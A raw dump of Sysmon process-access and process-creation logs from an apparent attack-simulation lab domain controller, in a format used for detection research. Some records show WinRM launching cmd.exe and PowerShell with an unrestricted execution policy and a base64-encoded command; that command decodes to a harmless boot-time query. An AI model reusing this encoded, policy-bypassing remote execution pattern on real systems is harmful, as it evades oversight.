10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3DD6-5F80-0903-000000007E01}28283660C:\Windows\system32\cmd.exe{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.185{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD6-5F80-0903-000000007E01}2828C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0903-000000007E01}2828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0903-000000007E01}2828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3DD6-5F80-0703-000000007E01}47884780C:\Windows\system32\WinrsHost.exe{733EE690-3DD6-5F80-0903-000000007E01}2828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.180{733EE690-3DD6-5F80-0903-000000007E01}2828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 